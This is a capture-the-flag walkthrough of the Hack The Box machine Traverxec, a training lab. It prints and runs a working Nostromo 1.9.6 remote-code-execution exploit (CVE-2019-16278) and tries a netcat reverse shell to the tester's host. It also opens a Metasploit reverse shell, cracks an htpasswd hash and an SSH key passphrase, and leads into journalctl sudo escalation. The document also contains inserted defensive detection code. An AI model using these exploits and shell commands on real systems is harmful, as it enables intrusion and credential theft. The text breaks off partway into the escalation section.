Quick Summary
→ Traverxec is another beginner-friendly machine that runs Linux. It has two open ports, 22 and 80, running an SSH and an HTTP service. There is nothing useful on the website itself, but the web server behind it is Nostromo 1.9.6, which has a directory traversal bypass that leads to RCE (Remote Code Execution) and gets us in as www-data.
After entering the target machine, the user's home directory gives Permission denied, but the web server configuration file shows that we can enter /public_www/ under the $HOMEDIRS path. That directory contains an SSH key, which I use to log in as user david.
The privilege escalation part was tricky. The user can run journalctl with root privileges through sudo; journalctl pipes output that does not fit the terminal through a pager, so the way to root is to shrink the terminal, let the pager open, and execute the !/bin/bash command from it to get the administrator shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ Discover open ports and the services running on them
Enumeration
→ Browse the HTTP service
→ Research Nostromo 1.9.6
Post-Exploitation
→ Enumerate the machine with the Nostromo 1.9.6 exploit
→ Use Metasploit to gain direct access
→ Run LinEnum (Scripted Local Linux Enumeration & Privilege Escalation Checks) to look for anything interesting on the machine
→ Crack the password hash that appears in the script output
→ Look at the configuration file, which shows we are allowed to enter /public_www/
Exploitation
→ Copy the backup SSH key into the /tmp/ directory
→ Enumerate david's files and find the SSH key
→ Extract a hash from the SSH key with ssh2john and crack it with John
→ Log in with the SSH key and the cracked passphrase, and get user.txt
Privilege Escalation
→ Abuse what the user is allowed to run with sudo, which is journalctl
→ GTFOBins shows that journalctl can be used to execute a shell
→ Shrink the terminal, execute !/bin/bash and become root
→ Finally, get root.txt
Network Scanning
Walkthrough
→ I always begin with Nmap to see which services are running. I always use:
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
- -A ⇒ Aggressive scan
- -oN ⇒ save the scan results to a text file
nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec

root in htb/boxes/Traverxec ❯ nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec
Starting Nmap 7.80 ( https:
Nmap scan report for 10.10.10.165
Host is up (0.26s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   258.62 ms 10.10.14.1
2   264.54 ms 10.10.10.165

OS and Service detection performed. Please report any incorrect results at https:
Nmap done: 1 IP address (1 host up) scanned in 37.77 seconds
root in htb/boxes/Traverxec took 38s ❯

Nmap results
So there are two open ports:
- 22 ⇒ used for SSH connections
- 80 ⇒ a website, served by Nostromo at version 1.9.6
Enumeration
Traverxec Website
Since there's a web service running, I'll look at it and see what I can get from it.
The front page of the website gives us a hint: a user named David White. I'll take note of this because that person could be our user.
The website also has a contact form, but nothing much of interest.
Other than that there's nothing more on the website, so I'll move on to the next phase.
My Nmap scan results show the HTTP service is running Nostromo 1.9.6. I used searchsploit to check whether that service has a known vulnerability, and it does.
Nostromo 1.9.6
root in htb/boxes/Traverxec ❯ searchsploit nostromo
 Exploit Title                                                          | Path (/usr/share/exploitdb/)
 Nostromo - Directory Traversal Remote Command Execution (Metasploit)   | exploits/multiple/remote/47573.rb
 nostromo 1.9.6 - Remote Code Execution                                 | exploits/multiple/remote/47837.py
 nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution   | exploits/linux/remote/35466.sh
Shellcodes: No Result
root in htb/boxes/Traverxec ❯
It's a directory traversal that leads to Remote Command Execution. I look at the exploit with searchsploit again, this time with -x:
root in htb/boxes/Traverxec ❯ searchsploit -x nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
and the exploit code:
import sys
import socket

# The original script prints an ASCII-art banner of the CVE id here;
# the art did not survive extraction, so it is reduced to plain text.
art = "CVE-2019-16278"

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'


def connect(soc):
    # Read the server's reply until it closes the connection.
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response


def cve(target, port, cmd):
    # Send the traversal request; the request body is what /bin/sh reads.
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)  # Python 2 str, as the writeup runs it under 2.7
    receive = connect(soc)
    print(receive)


if __name__ == "__main__":
    print(art)
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
        cve(target, port, cmd)
    except IndexError:
        print(help_menu)

root in htb/boxes/Traverxec ❯
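From the defender's side, an added example (my own code, not the exploit's or the writeup's) showing why a literal `../` check on the raw request line misses this payload: the `%0d` form contains no `../` until it is percent-decoded and the carriage returns are dropped. The request lines are constructed; the journal line is the one nostromo wrote on this box, taken from the server-stats output later in the writeup, and shows the server logging the already-decoded path.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines. The first is the traversal form the
# CVE-2019-16278 exploit sends; the others are benign or use other encodings.
SAMPLE_REQUESTS = [
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
    "GET /index.html HTTP/1.1",
    "GET /images/..%2f..%2fetc/passwd HTTP/1.1",
    "GET /docs/%2e%2e/secret HTTP/1.1",
    "GET /a/b/../c HTTP/1.1",
]

# Journal line in the format nostromo logged on the target after the exploit ran
# (copied from the server-stats output in the writeup).
SAMPLE_JOURNAL = "Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header"

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
JOURNAL_RE = re.compile(r"nhttpd\[\d+\]: (?P<path>/\S+) sent a bad cgi header")


def normalize_path(raw_path):
    """Percent-decode twice (catches double encoding), then drop control
    characters such as the CR that %0d decodes to, so '.<CR>.' becomes '..'."""
    return CONTROL_CHARS.sub("", unquote(unquote(raw_path)))


def naive_has_traversal(raw_path):
    """A literal-string check on the raw path, which the %0d form slips past."""
    return "/../" in raw_path


def has_traversal(raw_path):
    """Normalize first, then flag any '..' path segment."""
    path = normalize_path(raw_path).split("?", 1)[0]
    return any(segment == ".." for segment in path.split("/"))


def scan_request_line(line):
    """Return a finding dict for one 'METHOD PATH VERSION' line, or None."""
    parts = line.split()
    if len(parts) < 2:
        return None
    raw_path = parts[1]
    return {
        "method": parts[0],
        "raw": raw_path,
        "normalized": normalize_path(raw_path),
        "naive": naive_has_traversal(raw_path),
        "flagged": has_traversal(raw_path),
    }


def scan_requests(lines):
    return [r for r in map(scan_request_line, lines) if r is not None]


def scan_journal_line(line):
    """nostromo logs the decoded path, so a '..' segment there is a traversal attempt."""
    match = JOURNAL_RE.search(line)
    return bool(match) and has_traversal(match.group("path"))


if __name__ == "__main__":
    for r in scan_requests(SAMPLE_REQUESTS):
        print(f"{'ALERT' if r['flagged'] else 'ok   '} naive={r['naive']!s:5} "
              f"{r['raw']} -> {r['normalized']}")
    print("journal:", "ALERT" if scan_journal_line(SAMPLE_JOURNAL) else "ok")
```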
Post-Exploitation
Enumerate Traverxec machine
Having researched the Nostromo 1.9.6 vulnerability, I can use the exploit I have to execute a command such as whoami and hostname:
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ python cve2019_16278.py 10.10.10.165 80 whoami
HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:18:22 GMT
Server: nostromo 1.9.6
Connection: close

www-data
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯
As you can see, it returns www-data. Next I try hostname:
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ python cve2019_16278.py 10.10.10.165 80 hostname
HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:19:45 GMT
Server: nostromo 1.9.6
Connection: close

traverxec
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯
And it returns the hostname, traverxec. Now that I can execute commands, I try netcat to see if I can get a reverse shell, but it doesn't work; it returns the error Cmd line: wrong.
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ python cve2019_16278.py 10.10.10.165 80 nc 10.10.15.21 1339 -e /bin/bash
HTTP/1.1 200 OK
Date: Fri, 10 Apr 2020 22:21:52 GMT
Server: nostromo 1.9.6
Connection: close

Cmd line: wrong
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯
So I try Rapid7's Metasploit to get direct access to the target machine and a remote shell. I search for a Nostromo exploit, and it's exactly what I need:
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ msfconsole

       =[ metasploit v5.0.80-dev                          ]
+ -- --=[ 1983 exploits - 1085 auxiliary - 339 post       ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your module, why not try the reload command

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

msf5 >
Now I'll use it, but first I need to see the options to know what it requires:
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf5 exploit(multi/http/nostromo_code_exec) >
Get into the machine
So I set RHOSTS (the target host, Traverxec) and LHOST (the attacker's IP, me) and run the exploit.
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.21
LHOST => 10.10.15.21
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.21:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.21:4444 -> 10.10.10.165:51530) at 2020-04-11 06:45:16 +0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
So I now have direct access to the machine, but I need to upgrade it to an interactive shell with Python:

python -c 'import pty; pty.spawn("/bin/bash");'
Finally I have a www-data shell:

www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$
WWW-DATA
Now that I'm in, the enumeration starts again. To do this quickly I use LinEnum.sh; this script is very useful when an attacker wants to see what can be exploited or used for privilege escalation. From my Kali Linux machine I transfer LinEnum.sh into the /tmp folder and run it.
www-data@traverxec:/tmp$ ls
ls
systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v  vmware-root  vmware-root_557-4282236562
www-data@traverxec:/tmp$ wget http://10.10.15.21/LinEnum.sh
wget http://10.10.15.21/LinEnum.sh
--2020-04-10 19:02:22--  http://10.10.15.21/LinEnum.sh
Connecting to 10.10.15.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  59.0KB/s    in 0.8s

2020-04-10 19:02:24 (59.0 KB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@traverxec:/tmp$ ls
ls
LinEnum.sh  linux-exploit-suggester.sh  systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v  vmware-root  vmware-root_557-4282236562
www-data@traverxec:/tmp$
And of course running it gives us basic information about the target:
www-data@traverxec:/tmp$ bash LinEnum.sh
bash LinEnum.sh

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Fri Apr 10 19:03:30 EDT 2020

[-] Kernel information:
Linux traverxec 4.19.0-6-amd64

[-] Kernel information (continued):
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6))

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
traverxec

[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
There's also a previous login, and that will be our user, david:
[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Sat Nov 16 16:07:31 -0500 2019
david            pts/4    10.10.15.162     Fri Apr 09 18:59:23 -0400 2020
I can also see the user's entry in /etc/passwd, david:x:1000:1000:david,,,:/home/david:/bin/bash:
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
david:x:1000:1000:david,,,:/home/david:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
But the script is doing that for me ;) It also finds an htpasswd file with a hash:
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Now that I have a password hash for david, I use John to crack it with the rockyou.txt wordlist, and I get the password Nowonly4me:
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ john david --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (david)
1g 0:00:05:49 DONE (2020-04-11 07:12) 0.002864g/s 30305p/s 30305c/s 30305C/s Noyoudo..Nous4=5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root in htb/boxes/Traverxec via 🐍 v2.7.17 took 5m49s ❯
I try to log in over SSH with the password I got, but it isn't the right one; it's just a rabbit hole. So I move on and look at other things. I go to the home directory, but it doesn't let me list the files.
www-data@traverxec:/usr/bin$ cd /home
cd /home
www-data@traverxec:/home$ ls
ls
david
www-data@traverxec:/home$ cd david
cd david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$
So I look further through the machine's folders. I go first to the /var directory and see a nostromo folder, which is very interesting.
www-data@traverxec:/home/david$ cd /var
cd /var
www-data@traverxec:/var$ ls
ls
backups  cache  lib  local  lock  log  mail  nostromo  opt  run  spool  tmp
www-data@traverxec:/var$
Inside the nostromo folder there is a configuration file, nhttpd.conf, and it gives me a big hint about what to do next.
www-data@traverxec:/var/nostromo$ ls
ls
conf  htdocs  icons  logs
www-data@traverxec:/var/nostromo$ file conf
file conf
conf: directory
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$
The nhttpd.conf file contains these directives:
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

logpid                  logs/nhttpd.pid

user                    www-data

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

/icons                  /var/nostromo/icons

homedirs                /home
homedirs_public         public_www
www-data@traverxec:/var/nostromo/conf$
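As an added defensive check (my own code, not the writeup's or Nostromo's), the following parses the nhttpd.conf shown above and the .htpasswd entry LinEnum found, and flags the two settings that mattered on this box: the homedirs directive that publishes /home/<user>/public_www, and the md5crypt hash that John cracked in under six minutes. The config text and the htpasswd line are copied from the writeup; the hash-scheme table is my own.

```python
# Constructed copies of the nhttpd.conf shown above and of the .htpasswd
# entry LinEnum reported earlier; the hash is the one printed in the writeup.
NHTTPD_CONF = """\
servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

logpid                  logs/nhttpd.pid

user                    www-data

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

/icons                  /var/nostromo/icons

homedirs                /home
homedirs_public         public_www
"""

HTPASSWD = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/\n"

# crypt(3) hash prefixes an htpasswd file may contain and whether each is still
# acceptable; '$1$' (md5crypt) is the type John cracked in under six minutes.
HASH_SCHEMES = {
    "$1$": ("md5crypt", False),
    "$apr1$": ("apr1 (Apache MD5)", False),
    "$2y$": ("bcrypt", True),
    "$2b$": ("bcrypt", True),
    "$5$": ("sha256crypt", True),
    "$6$": ("sha512crypt", True),
}


def parse_nhttpd_conf(text):
    """Map each directive to its value; keys starting with '/' are path aliases."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return conf


def classify_hash(hash_value):
    for prefix, (name, acceptable) in HASH_SCHEMES.items():
        if hash_value.startswith(prefix):
            return name, acceptable
    return "unknown or traditional DES", False


def audit_htpasswd(text):
    findings = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, hash_value = line.split(":", 1)
        name, acceptable = classify_hash(hash_value)
        if not acceptable:
            findings.append(f"{user}: {name} hash is cheap to crack offline; rehash with bcrypt")
    return findings


def audit_conf(conf):
    findings = []
    if "homedirs" in conf:
        public = conf.get("homedirs_public", "")
        findings.append(
            f"homedirs serves {conf['homedirs']}/<user>/{public} over HTTP; on this box the "
            f"{conf.get('user', '?')} shell walked into it despite the Permission denied on "
            f"{conf['homedirs']}/david, so disable it unless users are meant to publish files")
    return findings


if __name__ == "__main__":
    for finding in audit_conf(parse_nhttpd_conf(NHTTPD_CONF)) + audit_htpasswd(HTPASSWD):
        print("-", finding)
```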
Exploitation
HOME DIRECTORY
Based on the homedirs line ($HOMEDIRS), we can access /public_www under /home/david even though listing that directory gives Permission denied. So I go back to david's directory and enter the public_www folder:
www-data@traverxec:/var/nostromo/conf$ cd /home/david
cd /home/david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$ cd public_www
cd public_www
www-data@traverxec:/home/david/public_www$ ls
ls
index.html  protected-file-area
www-data@traverxec:/home/david/public_www$
There's a protected-file-area directory. I hoped it contained a password, but it's a backup of an SSH key. Not bad! So:
www-data@traverxec:/home/david/public_www$ cd protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$
Since I don't have write permission in that folder, I extract the .tgz into the /tmp directory:
www-data@traverxec:/home/david/public_www/protected-file-area$ tar zxvf backup-ssh-identity-files.tgz -C /tmp
<rea$ tar zxvf backup-ssh-identity-files.tgz -C /tmp
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/home/david/public_www/protected-file-area$
I can see the SSH key files, which I can use to get in as user david.
www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp
cd /tmp
www-data@traverxec:/tmp$ ls
ls
home  systemd-private-52315d40046b4b63a760a2af02bc88ef-systemd-timesyncd.service-3xyrna  update  vmware-root  vmware-root_556-2966037836
www-data@traverxec:/tmp$ cd home
cd home
www-data@traverxec:/tmp/home$ ls
ls
david
www-data@traverxec:/tmp/home$ cd david
cd david
www-data@traverxec:/tmp/home/david$ ls -la
ls -la
total 12
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 .
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 ..
drwx------ 2 www-data www-data 4096 Oct 25 17:02 .ssh
www-data@traverxec:/tmp/home/david$ cd .ssh
cd .ssh
www-data@traverxec:/tmp/home/david/.ssh$ ls
ls
authorized_keys  id_rsa  id_rsa.pub
Now I need to copy id_rsa to my machine.
www-data@traverxec:/tmp/home/david/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
www-data@traverxec:/tmp/home/david/.ssh$
Crack the SSH key passphrase with ssh2john
I try to log in over SSH with id_rsa, thinking I can get into the machine, but it asks for a passphrase. To get it, I run id_rsa through ssh2john to extract a crackable hash.
root in htb/boxes/Traverxec via 🐍 v2.7.17 took 3s ❯ python ssh2john.py id_rsa > id_rsa-hash
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ ls
cve2019_16278.py  david  id_rsa  id_rsa-hash  LinEnum.sh  nmap-Traverxec  ssh2john.py
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ cat id_rsa-hash
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$[hash body omitted]
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯
Now that I have the hash, it's time to use John to crack it and get the passphrase.
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ john id_rsa-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯
Login with SSH and get user.txt
Looks good! That's enough, I think. Now it's time to log in over SSH with the passphrase hunter.
root in htb/boxes/Traverxec via 🐍 v2.7.17 ❯ ssh -v -i id_rsa david@10.10.10.165
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d 10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.165 [10.10.10.165] port 22.
debug1: Connection established.
debug1: identity file id_rsa type -1
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.9p1 Debian-10+deb10u1
debug1: match: OpenSSH_7.9p1 Debian-10+deb10u1 pat OpenSSH* compat 0x04000000
debug1: Authenticating to 10.10.10.165:22 as 'david'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo
debug1: Host '10.10.10.165' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:7
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: id_rsa
Enter passphrase for key 'id_rsa':
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.165 ([10.10.10.165]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Remote: /home/david/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Fri Apr 10 19:06:53 2020 from 10.10.15.162
david@traverxec:~$ whoami
david
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b[--------------------]82f3d
david@traverxec:~$
Privilege Escalation
JOURNALCTL
This part was tricky. The user david is allowed to run journalctl through sudo, which gives it root privileges, but when I try sudo -l it asks for a password, so that wasn't the right approach. I looked up journalctl and luckily found it on GTFOBins: "It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo." So I first examined server-stats.head, a header file in the bin directory that prints some information about the server.
david@traverxec:~/bin$ cat server-stats.head
[ASCII-art banner: "Webserver Statistics and Data Collection Script (c) David, 2019"]
david@traverxec:~/bin$
The last line of server-stats.sh is the important one. It runs journalctl through sudo, which means journalctl runs with root privileges; therefore, if we can control journalctl, we have root. However, we cannot change any parameters: running anything other than sudo journalctl -n5 -unostromo.service requires a password.
david@traverxec:~/bin$ cat server-stats.sh
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
david@traverxec:~/bin$
Running server-stats.sh:

david@traverxec:~/bin$ server-stats.sh
[ASCII-art banner: "Webserver Statistics and Data Collection Script (c) David, 2019"]

Load:  19:52:22 up 1 min,  1 user,  load average: 0.16, 0.09, 0.03
Open nhttpd sockets: 2
Files in the docroot: 117
Last 5 journal log lines:
-- Logs begin at Thurs 2020-04-09 19:50:59 EDT, end at Fri 2020-04-10 19:52:23 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Apr 10 19:51:03 traverxec nhttpd[459]: started
